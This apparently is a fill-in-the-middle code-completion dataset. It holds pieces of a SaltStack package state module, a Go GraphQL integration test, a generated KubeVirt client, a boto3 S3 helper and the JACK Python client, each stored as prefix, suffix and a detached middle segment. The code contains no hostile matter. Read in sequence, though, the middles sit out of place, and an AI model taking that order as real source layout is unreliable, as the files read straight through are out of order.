version would not match.
normalize : True
Normalize the package name by removing the architecture, if the
architecture of the package is different from the architecture of the
operating system. The ability to disable this behavior is useful for
poorly-created packages which include the architecture as an actual
part of the name, such as kernel modules which match a specific kernel
version.
.. versionadded:: 2015.8.0
ignore_epoch : None
If this option is not explicitly set, and there is no epoch in the
desired package version, the epoch will be implicitly ignored. Set this
argument to ``True`` to explicitly ignore the epoch, and ``False`` to
strictly enforce it.
.. versionadded:: 2015.8.9
.. versionchanged:: 3001
In prior releases, the default behavior was to strictly enforce
epochs unless this argument was set to ``True``.
Multiple Package Options:
pkgs
A list of packages to purge. Must be passed as a python list. The
``name`` parameter will be ignored if this option is passed. It accepts
version numbers as well.
.. versionadded:: 0.16.0
"""
kwargs["saltenv"] = __env__
try:
return _uninstall(
action="purge",
name=name,
version=version,
pkgs=pkgs,
normalize=normalize,
ignore_epoch=ignore_epoch,
**kwargs
)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while purging package(s): {}".format(exc)
return ret
def uptodate(name, refresh=False, pkgs=None, **kwargs):
"""
.. versionadded:: 2014.7.0
.. versionchanged:: 2018.3.0
Added support for the ``pkgin`` provider.
Verify that the system is completely up to date.
name
The name has no functional value and is only used as a tracking
reference
refresh
refresh the package database before checking for new upgrades
pkgs
list of packages to upgrade
:param str cache_valid_time:
This parameter sets the value in seconds after which cache marked as invalid,
and cache update is necessary. This overwrite ``refresh`` parameter
default behavior.
In this case cache_valid_time is set, refresh will not take place for
amount in seconds since last ``apt-get update`` executed on the system.
.. note::
This parameter available only on Debian based distributions, and
have no effect on the rest.
:param bool resolve_capabilities:
Turn on resolving capabilities. This allow one to name "provides" or alias names for packages.
.. versionadded:: 2018.3.0
kwargs
Any keyword arguments to pass through to ``pkg.upgrade``.
.. versionadded:: 2015.5.0
"""
ret = {"name": name, "changes": {}, "result": False, "comment": "Failed to update"}
if "pkg.list_upgrades" not in __salt__:
ret["comment"] = "State pkg.uptodate is not available"
return ret
# emerge --update doesn't appear to support repo notation
if "fromrepo" in kwargs and __grains__["os"] == "Gentoo":
ret["comment"] = "'fromrepo' argument not supported on this platform"
return ret
if isinstance(refresh, bool):
pkgs, refresh = _resolve_capabilities(pkgs, refresh=refresh, **kwargs)
try:
packages = __salt__["pkg.list_upgrades"](refresh=refresh, **kwargs)
expected = {
pkgname: {
"new": pkgver,
"old": __salt__["pkg.version"](pkgname, **kwargs),
}
for pkgname, pkgver in packages.items()
}
if isinstance(pkgs, list):
packages = [pkg for pkg in packages if pkg in pkgs]
expected = {
pkgname: pkgver
for pkgname, pkgver in expected.items()
if pkgname in pkgs
}
except Exception as exc: # pylint: disable=broad-except
ret["comment"] = str(exc)
return ret
else:
ret["comment"] = "refresh must be either True or False"
return ret
if not packages:
ret["comment"] = "System is already up-to-date"
ret["result"] = True
return ret | return ret
try:
ret["changes"] = __salt__["pkg.upgrade"](refresh=refresh, pkgs=pkgs, **kwargs)
except CommandExecutionError as exc:
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret[
"comment"
] = "An error was encountered while updating packages: {}".format(exc)
return ret
# If a package list was provided, ensure those packages were updated
missing = []
if isinstance(pkgs, list):
missing = [pkg for pkg in expected.keys() if pkg not in ret["changes"]]
if missing:
ret["comment"] = "The following package(s) failed to update: {}".format(
", ".join(missing)
)
ret["result"] = False
else:
ret["comment"] = "Upgrade ran successfully"
ret["result"] = True
return ret
def group_installed(name, skip=None, include=None, **kwargs):
"""
.. versionadded:: 2015.8.0
.. versionchanged:: 2016.11.0
Added support in :mod:`pacman <salt.modules.pacman>`
Ensure that an entire package group is installed. This state is currently
only supported for the :mod:`yum <salt.modules.yumpkg>` and :mod:`pacman <salt.modules.pacman>`
package managers.
skip
Packages that would normally be installed by the package group
("default" packages), which should not be installed.
.. code-block:: yaml
Load Balancer:
pkg.group_installed:
- skip:
- piranha
include
Packages which are included in a group, which would not normally be
installed by a ``yum groupinstall`` ("optional" packages). Note that
this will not enforce group membership; if you include packages which
are not members of the specified groups, they will still be installed.
.. code-block:: yaml
Load Balancer:
pkg.group_installed:
- include:
- haproxy
.. versionchanged:: 2016.3.0
This option can no longer be passed as a comma-separated list, it
must now be passed as a list (as shown in the above example).
.. note::
Because this is essentially a wrapper around :py:func:`pkg.install
<salt.modules.yumpkg.install>`, any argument which can be passed to
pkg.install may also be included here, and it will be passed on to the
call to :py:func:`pkg.install <salt.modules.yumpkg.install>`.
"""
ret = {"name": name, "changes": {}, "result": False, "comment": ""}
if "pkg.group_diff" not in __salt__:
ret["comment"] = "pkg.group_install not available for this platform"
return ret
if skip is None:
skip = []
else:
if not isinstance(skip, list):
ret["comment"] = "skip must be formatted as a list"
return ret
for idx, item in enumerate(skip):
if not isinstance(item, str):
skip[idx] = str(item)
if include is None:
include = []
else:
if not isinstance(include, list):
ret["comment"] = "include must be formatted as a list"
return ret
for idx, item in enumerate(include):
if not isinstance(item, str):
include[idx] = str(item)
try:
diff = __salt__["pkg.group_diff"](name)
except CommandExecutionError as err:
ret[
"comment"
] = "An error was encountered while installing/updating group '{}': {}.".format(
name, err
)
return ret
mandatory = diff["mandatory"]["installed"] + diff["mandatory"]["not installed"]
invalid_skip = [x for x in mandatory if x in skip]
if invalid_skip:
ret[
"comment"
] = "The following mandatory packages cannot be skipped: {}".format(
", ".join(invalid_skip)
)
return ret
targets = diff["mandatory"]["not installed"]
targets.extend([x for x in diff["default"]["not installed"] if x not in skip])
targets.extend(include)
if not targets:
ret["result"] = True
ret["comment"] = "Group '{}' is already installed".format(name)
return ret
partially_installed = (
diff["mandatory"]["installed"]
or diff["default"]["installed"]
or diff["optional"]["installed"]
)
if __opts__["test"]:
ret["result"] = None
if partially_installed:
ret[
"comment"
] = "Group '{}' is partially installed and will be updated".format(name)
else:
ret["comment"] = "Group '{}' will be installed".format(name)
return ret
try:
ret["changes"] = __salt__["pkg.install"](pkgs=targets, **kwargs)
except CommandExecutionError as exc:
ret = {"name": name, "result": False}
if exc.info:
# Get information for state return from the exception.
ret["changes"] = exc.info.get("changes", {})
ret["comment"] = exc.strerror_without_changes
else:
ret["changes"] = {}
ret["comment"] = (
"An error was encountered while "
"installing/updating group '{}': {}".format(name, exc)
)
return ret
failed = [x for x in targets if x not in __salt__["pkg.list_pkgs"](**kwargs)]
if failed:
ret["comment"] = "Failed to install the following packages: {}".format(
", ".join(failed)
)
return ret
ret["result"] = True
ret["comment"] = "Group '{}' was {}".format(
name, "updated" if partially_installed else "installed"
)
return ret
def mod_init(low):
"""
Set a flag to tell the install functions to refresh the package database.
This ensures that the package database is refreshed only once during
a state run significantly improving the speed of package management
during a state run.
It sets a flag for a number of reasons, primarily due to timeline logic.
When originally setting up the mod_init for pkg a number of corner cases
arose with different package managers and how they refresh package data.
It also runs the "ex_mod_init" from the package manager module that is
currently loaded. The "ex_mod_init" is expected to work as a normal
"mod_init" function.
.. seealso::
:py:func:`salt.modules.ebuild.ex_mod_init`
"""
ret = True
if "pkg.ex_mod_init" in __salt__:
ret = __salt__["pkg.ex_mod_init"](low)
if low["fun"] == "installed" or low["fun"] == "latest":
salt.utils.pkg.write_rtag(__opts__)
return ret
return False
def mod_aggregate(low, chunks, running):
"""
The mod_aggregate function which looks up all packages in the available
low chunks and merges them into a single pkgs ref in the present low data
"""
pkgs = []
pkg_type = None
agg_enabled = [
"installed",
"latest",
"removed",
"purged",
]
if low.get("fun") not in agg_enabled:
return low
for chunk in chunks:
tag = __utils__["state.gen_tag"](chunk)
if tag in running:
# Already ran the pkg state, skip aggregation
continue
if chunk.get("state") == "pkg":
if "__agg__" in chunk:
continue
# Check for the same function
if chunk.get("fun") != low.get("fun"):
continue
# Check for the same repo
if chunk.get("fromrepo") != low.get("fromrepo"):
continue
# Check first if 'sources' was passed so we don't aggregate pkgs
# and sources together.
if "sources" in chunk:
if pkg_type is None:
pkg_type = "sources"
if pkg_type == "sources":
pkgs.extend(chunk["sources"])
chunk["__agg__"] = True
else:
# If hold exists in the chunk, do not add to aggregation
# otherwise all packages will be held or unheld.
# setting a package to be held/unheld is not as
# time consuming as installing/uninstalling.
if "hold" not in chunk:
if pkg_type is None:
pkg_type = "pkgs"
if pkg_type == "pkgs":
# Pull out the pkg names!
if "pkgs" in chunk:
pkgs.extend(chunk["pkgs"])
chunk["__agg__"] = True
elif "name" in chunk:
version = chunk.pop("version", None)
if version is not None:
pkgs.append({chunk["name"]: version})
else:
pkgs.append(chunk["name"])
chunk["__agg__"] = True
if pkg_type is not None and pkgs:
if pkg_type in low:
low[pkg_type].extend(pkgs)
else:
low[pkg_type] = pkgs
return low
def mod_watch(name, **kwargs):
"""
Install/reinstall a package based on a watch requisite
.. note::
This state exists to support special handling of the ``watch``
:ref:`requisite <requisites>`. It should not be called directly.
Parameters for this function should be set by the state being triggered.
"""
sfun = kwargs.pop("sfun", None)
mapfun = {
"purged": purged,
"latest": latest,
"removed": removed,
"installed": installed,
}
if sfun in mapfun:
return mapfun[sfun](name, **kwargs)
return {
"name": name,
"changes": {},
"comment": "pkg.{} does not work with the watch requisite".format(sfun),
"result": False,
}
def mod_beacon(name, **kwargs):
"""
Create a beacon to monitor a package or packages
based on a beacon state argument.
.. note::
This state exists to support special handling of the ``beacon``
state argument for supported state functions. It should not be called directly.
"""
ret = {"name": name, "changes": {}, "result": True, "comment": ""}
sfun = kwargs.pop("sfun", None)
supported_funcs = ["installed", "removed"]
if sfun in supported_funcs:
if kwargs.get("beacon"):
beacon_module = "pkg"
beacon_name = "beacon_{}_{}".format(beacon_module, name)
beacon_kwargs = {
"name": beacon_name,
"pkgs": kwargs.get("pkgs", [name]),
"interval": 60,
"beacon_module": beacon_module,
}
ret = __states__["beacon.present"](**beacon_kwargs)
return ret
else:
return {
"name": name,
"changes": {},
"comment": "Not adding beacon.",
"result": True,
}
else:
return {
"name": name,
"changes": {},
"comment": "pkg.{} does not work with the mod_beacon state function".format(
sfun
),
"result": False,
} | elif __opts__["test"]:
ret["comment"] = "System update will be performed"
ret["changes"] = expected
ret["result"] = None |
repository_test.go | //go:build all || integration
// +build all integration
package agora
import (
"context"
"log"
"os"
"testing"
"github.com/joho/godotenv"
"github.com/shurcooL/graphql"
)
var graphqlUri string = "http://localhost:8080/graphql"
func init() {
if err := godotenv.Load(); err != nil {
log.Fatal(err)
}
graphqlUri = os.Getenv("GRAPHQL_URI")
}
func TestDgraphUniverseRepositoryFind(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryFind_name",
User: "TestDgraphUniverseRepositoryFind_user",
Description: "TestDgraphUniverseRepositoryFind_description",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id") | if gotUniverse, err := repo.Find(ctx, wantUniverse.Id); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
}
func TestDgraphUniverseRepositoryFindByNameAndUser(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryFindByNameAndUser_name",
User: "TestDgraphUniverseRepositoryFindByNameAndUser_user",
Description: "TestDgraphUniverseRepositoryFindByNameAndUser_description",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id")
}
if gotUniverse, err := repo.FindByNameAndUser(ctx, wantUniverse.Name, wantUniverse.User); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
}
func TestDgraphUniverseRepositoryUpdate(t *testing.T) {
wantUniverse := &Universe{
Name: "TestDgraphUniverseRepositoryUpdate_name_before",
User: "TestDgraphUniverseRepositoryUpdate_user_before",
Description: "TestDgraphUniverseRepositoryUpdate_description_before",
}
graphql := graphql.NewClient(graphqlUri, nil)
repo := &GraphqlUniverseRepository{graphql}
ctx := context.Background()
if err := repo.Insert(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
defer func(u *Universe) {
if err := repo.Delete(ctx, u); err != nil {
t.Fatal(err)
}
}(wantUniverse)
if len(wantUniverse.Id) == 0 {
t.Fatalf("Got empty universe Id")
}
wantUniverse.Name = "TestDgraphUniverseRepositoryUpdate_name_after"
wantUniverse.User = "TestDgraphUniverseRepositoryUpdate_user_after"
wantUniverse.Description = "TestDgraphUniverseRepositoryUpdate_description_after"
if err := repo.Update(ctx, wantUniverse); err != nil {
t.Fatal(err)
}
if gotUniverse, err := repo.Find(ctx, wantUniverse.Id); err != nil {
t.Fatal(err)
} else if gotUniverse.Id != wantUniverse.Id {
t.Errorf("Got id = %v, want %v", gotUniverse.Id, wantUniverse.Id)
} else if gotUniverse.Name != wantUniverse.Name {
t.Errorf("Got name = %s, want %s", gotUniverse.Name, wantUniverse.Name)
} else if gotUniverse.User != wantUniverse.User {
t.Errorf("Got user = %s, want %s", gotUniverse.User, wantUniverse.User)
} else if gotUniverse.Description != wantUniverse.Description {
t.Errorf("Got description = %s, want %s", gotUniverse.Description, wantUniverse.Description)
}
} | }
|
cdi.go | /*
Copyright 2022 The KubeVirt Authors.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
// Code generated by client-gen. DO NOT EDIT.
package v1beta1
import (
"context"
"time"
v1 "k8s.io/apimachinery/pkg/apis/meta/v1"
types "k8s.io/apimachinery/pkg/types"
watch "k8s.io/apimachinery/pkg/watch"
rest "k8s.io/client-go/rest"
scheme "kubevirt.io/client-go/generated/containerized-data-importer/clientset/versioned/scheme"
v1beta1 "kubevirt.io/containerized-data-importer-api/pkg/apis/core/v1beta1"
)
// CDIsGetter has a method to return a CDIInterface.
// A group's client should implement this interface.
type CDIsGetter interface {
CDIs() CDIInterface
}
// CDIInterface has methods to work with CDI resources.
type CDIInterface interface {
Create(ctx context.Context, cDI *v1beta1.CDI, opts v1.CreateOptions) (*v1beta1.CDI, error)
Update(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (*v1beta1.CDI, error)
UpdateStatus(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (*v1beta1.CDI, error)
Delete(ctx context.Context, name string, opts v1.DeleteOptions) error
DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error
Get(ctx context.Context, name string, opts v1.GetOptions) (*v1beta1.CDI, error)
List(ctx context.Context, opts v1.ListOptions) (*v1beta1.CDIList, error)
Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error)
Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1beta1.CDI, err error)
CDIExpansion
}
// cDIs implements CDIInterface
type cDIs struct {
client rest.Interface
}
// newCDIs returns a CDIs
func newCDIs(c *CdiV1beta1Client) *cDIs |
// Get takes name of the cDI, and returns the corresponding cDI object, and an error if there is any.
func (c *cDIs) Get(ctx context.Context, name string, options v1.GetOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Get().
Resource("cdis").
Name(name).
VersionedParams(&options, scheme.ParameterCodec).
Do(ctx).
Into(result)
return
}
// List takes label and field selectors, and returns the list of CDIs that match those selectors.
func (c *cDIs) List(ctx context.Context, opts v1.ListOptions) (result *v1beta1.CDIList, err error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
result = &v1beta1.CDIList{}
err = c.client.Get().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Do(ctx).
Into(result)
return
}
// Watch returns a watch.Interface that watches the requested cDIs.
func (c *cDIs) Watch(ctx context.Context, opts v1.ListOptions) (watch.Interface, error) {
var timeout time.Duration
if opts.TimeoutSeconds != nil {
timeout = time.Duration(*opts.TimeoutSeconds) * time.Second
}
opts.Watch = true
return c.client.Get().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Timeout(timeout).
Watch(ctx)
}
// Create takes the representation of a cDI and creates it. Returns the server's representation of the cDI, and an error, if there is any.
func (c *cDIs) Create(ctx context.Context, cDI *v1beta1.CDI, opts v1.CreateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Post().
Resource("cdis").
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// Update takes the representation of a cDI and updates it. Returns the server's representation of the cDI, and an error, if there is any.
func (c *cDIs) Update(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Put().
Resource("cdis").
Name(cDI.Name).
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// UpdateStatus was generated because the type contains a Status member.
// Add a +genclient:noStatus comment above the type to avoid generating UpdateStatus().
func (c *cDIs) UpdateStatus(ctx context.Context, cDI *v1beta1.CDI, opts v1.UpdateOptions) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Put().
Resource("cdis").
Name(cDI.Name).
SubResource("status").
VersionedParams(&opts, scheme.ParameterCodec).
Body(cDI).
Do(ctx).
Into(result)
return
}
// Delete takes name of the cDI and deletes it. Returns an error if one occurs.
func (c *cDIs) Delete(ctx context.Context, name string, opts v1.DeleteOptions) error {
return c.client.Delete().
Resource("cdis").
Name(name).
Body(&opts).
Do(ctx).
Error()
}
// DeleteCollection deletes a collection of objects.
func (c *cDIs) DeleteCollection(ctx context.Context, opts v1.DeleteOptions, listOpts v1.ListOptions) error {
var timeout time.Duration
if listOpts.TimeoutSeconds != nil {
timeout = time.Duration(*listOpts.TimeoutSeconds) * time.Second
}
return c.client.Delete().
Resource("cdis").
VersionedParams(&listOpts, scheme.ParameterCodec).
Timeout(timeout).
Body(&opts).
Do(ctx).
Error()
}
// Patch applies the patch and returns the patched cDI.
func (c *cDIs) Patch(ctx context.Context, name string, pt types.PatchType, data []byte, opts v1.PatchOptions, subresources ...string) (result *v1beta1.CDI, err error) {
result = &v1beta1.CDI{}
err = c.client.Patch(pt).
Resource("cdis").
Name(name).
SubResource(subresources...).
VersionedParams(&opts, scheme.ParameterCodec).
Body(data).
Do(ctx).
Into(result)
return
}
| {
return &cDIs{
client: c.RESTClient(),
}
} |
s3_operations.py |
import os
import boto3
import typeguard
from botocore.exceptions import ClientError
from os import listdir
from os.path import isfile, join
from benchmark_runner.common.clouds.shared.s3.s3_operations_exceptions import S3FileNotUploaded, S3FileNotDownloaded, S3FileNotDeleted, S3KeyNotCreated, S3FileNotExist, S3FailedCreatePresingedURL
from benchmark_runner.main.environment_variables import environment_variables
class S3Operations:
""" This class is responsible for S3 operations """
def __init__(self, region_name: str = '', endpoint_url: str = None, aws_access_key_id: str = None, aws_secret_access_key: str = None):
# environment variables
self.__environment_variables_dict = environment_variables.environment_variables_dict
# must add region for pytest
if region_name:
self.__region = region_name
self.__endpoint_url = endpoint_url
self.__aws_access_key_id = aws_access_key_id
self.__aws_secret_access_key = aws_secret_access_key
else:
self.__region = self.__environment_variables_dict.get('region_name', '')
# must be None for pytest
self.__endpoint_url = self.__environment_variables_dict.get('endpoint_url', None)
self.__aws_access_key_id = self.__environment_variables_dict.get('access_key_id', '')
self.__aws_secret_access_key = self.__environment_variables_dict.get('secret_access_key', '')
self.__s3_client = boto3.client(service_name='s3',
region_name=self.__region,
endpoint_url=self.__endpoint_url,
aws_access_key_id=self.__aws_access_key_id,
aws_secret_access_key=self.__aws_secret_access_key)
@typeguard.typechecked
def upload_file(self, file_name_path: str, bucket: str, key: str, upload_file: str):
"""
This method upload file to s3
:param file_name_path:'/home/user/test.txt'
:param bucket:'benchmark'
:param key:'test-data'
:param upload_file:'test.txt'
:return:
"""
try:
self.__s3_client.upload_file(Filename=file_name_path,
Bucket=bucket,
Key=f'{key}/{upload_file}',
ExtraArgs={'ServerSideEncryption': 'AES256'})
except ClientError:
raise
except Exception:
raise S3FileNotUploaded
@typeguard.typechecked
def download_file(self, bucket: str, key: str, download_file: str, file_name_path: str):
"""
This method download file from s3
:param bucket:'benchmark'
:param key:'logs/ec2-idle/2021/01/19/18'
:param download_file: 'test.txt'
:param file_name_path:'D:\\Performance\\Projects\\py-image-service\\data\\rt_results\\test.txt'
:return:
"""
try:
if download_file:
self.__s3_client.download_file(Bucket=bucket, Key=f'{key}/{download_file}', Filename=file_name_path)
else:
self.__s3_client.download_file(Bucket=bucket, Key=key, Filename=file_name_path)
except ClientError:
raise
except Exception:
raise S3FileNotDownloaded
@typeguard.typechecked
def delete_file(self, bucket: str, key: str, file_name: str):
"""
This method delete file from s3
:param bucket:'benchmark'
:param key:'test-data'
:param file_name: 'test.txt'
:return:
"""
try:
self.__s3_client.delete_object(Bucket=bucket, Key=f'{key}/{file_name}')
except ClientError:
raise
except Exception:
raise S3FileNotDeleted
@typeguard.typechecked
def delete_folder(self, bucket: str, key: str):
"""
This method delete folder from s3
:param bucket:'benchmark'
:param key:'framework/test'
:return:
"""
try:
objects_to_delete = self.__s3_client.list_objects(Bucket=bucket, Prefix=key)
delete_keys = {
'Objects': [{'Key': k} for k in [obj['Key'] for obj in objects_to_delete.get('Contents', [])]]}
if delete_keys['Objects']:
self.__s3_client.delete_objects(Bucket=bucket, Delete=delete_keys)
except ClientError:
raise
except Exception:
raise S3FileNotDeleted
@typeguard.typechecked
def create_folder(self, bucket: str, key: str):
"""
This method download file from s3
:param bucket:'benchmark'
:param key:'framework/test'
:return:
"""
try:
self.__s3_client.put_object(Bucket=bucket, Key=key)
except ClientError:
raise
except Exception:
raise S3KeyNotCreated
@typeguard.typechecked
def file_exist(self, bucket: str, key: str, file_name: str):
"""
This method check if file exist
:param bucket:'benchmark'
:param key:'framework/test'
:param file_name:'file.txt'
:return:
"""
try:
response = self.__s3_client.list_objects_v2(Bucket=bucket, Prefix=key)
if response.get('Contents'):
for item in response['Contents']:
if file_name in item['Key']:
return True
return False
# Todo add custom error
except ClientError:
raise
except Exception:
raise S3FileNotExist
@typeguard.typechecked
def upload_objects(self, local_source: str, s3_target: str):
"""
This method upload local data folder to s3 target path
:param local_source: local data folder i.e. '/home/user/'
:param s3_target: target s3 path i.e. 'data_store/calc_image_data/'
:return:
"""
try:
if '/' in s3_target:
targets = s3_target.split('/')
bucket = targets[0]
key = '/'.join(targets[1:])
else:
bucket = s3_target
key = ''
files = [f for f in listdir(local_source) if isfile(join(local_source, f))]
for file in files:
filename = os.path.join(local_source, file)
self.upload_file(file_name_path=filename, bucket=bucket, key=key, upload_file=file)
except ClientError as err:
raise
except Exception:
raise S3FileNotUploaded
@typeguard.typechecked
def download_objects(self, s3_target: str, local_source: str):
"""
This method download from s3 target to local data folder
:param local_source: local data folder i.e. '/home/user/
:param s3_target: target s3 path i.e. 'data_store/calc_image_data/'
:return:
"""
files = []
try:
if '/' in s3_target:
targets = s3_target.split('/')
bucket = targets[0]
key = '/'.join(targets[1:])
else:
bucket = s3_target
key = ''
response = self.__s3_client.list_objects_v2(Bucket=bucket, Prefix=key)
if response.get('Contents'):
for item in response['Contents']:
if item['Key'].split('/')[-1]:
files.append(item['Key'].split('/')[-1])
else:
|
for file in files:
file_name = os.path.join(local_source, file)
self.download_file(bucket=bucket, key=key, download_file=file, file_name_path=file_name)
except ClientError as err:
raise
except Exception:
raise S3FileNotDownloaded
@typeguard.typechecked
def generate_presigned_url(self, bucket: str, key: str, file_name: str):
"""
This method generate presigned url for specific uploaded object, default 7 days
:param bucket:'benchmark'
:param key:'logs/test-data'
:param file_name:'file.txt'
:return:
"""
try:
return self.__s3_client.generate_presigned_url('get_object',
Params={'Bucket': bucket, 'Key': f'{key}/{file_name}'},
ExpiresIn=604800)
# Todo add custom error
except ClientError:
raise
except Exception:
raise S3FailedCreatePresingedURL
| files.append(item['Key']) |
jack.py | # Copyright (c) 2014-2015 Matthias Geier
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
"""JACK Client for Python.
http://jackclient-python.readthedocs.io/
"""
__version__ = '0.4.3'
from ctypes.util import find_library as _find_library
import errno as _errno
import platform as _platform
import warnings as _warnings
from _jack import ffi as _ffi
if _platform.system() == 'Windows':
if _platform.architecture()[0] == '64bit':
_libname = _find_library('libjack64')
else:
_libname = _find_library('libjack')
else:
_libname = _find_library('jack')
if _libname is None:
raise OSError('JACK library not found')
_lib = _ffi.dlopen(_libname)
_AUDIO = b'32 bit float mono audio'
_MIDI = b'8 bit raw midi'
STOPPED = _lib.JackTransportStopped
"""Transport halted."""
ROLLING = _lib.JackTransportRolling
"""Transport playing."""
STARTING = _lib.JackTransportStarting
"""Waiting for sync ready."""
NETSTARTING = _lib.JackTransportNetStarting
"""Waiting for sync ready on the network."""
_SUCCESS = 0
_FAILURE = 1
class Client(object):
"""A client that can connect to the JACK audio server."""
def __init__(self, name, use_exact_name=False, no_start_server=False,
servername=None, session_id=None):
"""Create a new JACK client.
A client object is a *context manager*, i.e. it can be used in a
*with statement* to automatically call `activate()` in the
beginning of the statement and `deactivate()` and `close()` on
exit.
Parameters
----------
name : str
The desired client name of at most `client_name_size()`
characters. The name scope is local to each server.
Unless forbidden by the *use_exact_name* option, the server
will modify this name to create a unique variant, if needed.
Other Parameters
----------------
use_exact_name : bool
Whether an error should be raised if *name* is not unique.
See `Status.name_not_unique`.
no_start_server : bool
Do not automatically start the JACK server when it is not
already running. This option is always selected if
``JACK_NO_START_SERVER`` is defined in the calling process
environment.
servername : str
Selects from among several possible concurrent server
instances.
Server names are unique to each user. If unspecified, use
``'default'`` unless ``JACK_DEFAULT_SERVER`` is defined in
the process environment.
session_id : str
Pass a SessionID Token. This allows the sessionmanager to
identify the client again.
"""
status = _ffi.new('jack_status_t*')
options = _lib.JackNullOption
optargs = []
if use_exact_name:
options |= _lib.JackUseExactName
if no_start_server:
options |= _lib.JackNoStartServer
if servername:
options |= _lib.JackServerName
optargs.append(_ffi.new('char[]', servername.encode()))
if session_id:
options |= _lib.JackSessionID
optargs.append(_ffi.new('char[]', session_id.encode()))
self._ptr = _lib.jack_client_open(name.encode(), options, status,
*optargs)
self._status = Status(status[0])
if not self._ptr:
raise JackError('Error initializing "{0}": {1}'.format(
name, self.status))
self._inports = Ports(self, _AUDIO, _lib.JackPortIsInput)
self._outports = Ports(self, _AUDIO, _lib.JackPortIsOutput)
self._midi_inports = Ports(self, _MIDI, _lib.JackPortIsInput)
self._midi_outports = Ports(self, _MIDI, _lib.JackPortIsOutput)
self._keepalive = []
self._position = _ffi.new('jack_position_t*')
# Avoid confusion if something goes wrong before opening the client:
_ptr = _ffi.NULL
def __enter__(self):
self.activate()
return self
def __exit__(self, *args):
self.deactivate()
self.close()
def __del__(self):
"""Close JACK client on garbage collection."""
self.close()
@property
def name(self):
"""The name of the JACK client (read-only)."""
return _ffi.string(_lib.jack_get_client_name(self._ptr)).decode()
@property
def samplerate(self):
"""The sample rate of the JACK system (read-only)."""
